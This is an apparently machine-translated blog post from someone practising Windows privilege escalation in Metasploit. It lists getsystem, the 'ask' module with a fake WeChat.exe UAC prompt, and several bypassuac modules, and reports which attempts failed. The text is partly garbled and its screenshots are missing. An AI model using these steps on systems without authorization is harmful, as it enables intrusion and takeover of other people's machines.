Mention of the right to operate msf

Would like an early end to the epidemic, the struggle to return to school
to use getsystem to get the highest authority

getsystem

This discovery has burst error

[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Here Insert Picture Description
Improve program run level (trigger UAC)
msf modules:

use exploit/windows/local/ask
info

Here Insert Picture Description

set session 1
show options

Here Insert Picture Description
Setting pop-up content

set filename WeChat.exe

Here Insert Picture Description
See, and click on a
Here Insert Picture Description
pop-up a new session
Here Insert Picture Description
direct access to system privileges

getsystem

Here Insert Picture Description
UAC bypass, without having to click
to use msf modules:

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs

Use the first

use exploit/windows/local/bypassuac

Here Insert Picture Description
This discovery module applies to x86, I was x64, let's try
and found that you can
Here Insert Picture Description
find a date, get a new payload to try to put right

use exploit/windows/local/bypassuac_silentcleanup

Here Insert Picture Description
No results, also try the second and third, nor given above, the system is still influential digit
Here Insert Picture Description

Published 36 original articles · won praise 9 · views 8204

Guess you like

Origin blog.csdn.net/qq_44902875/article/details/104717496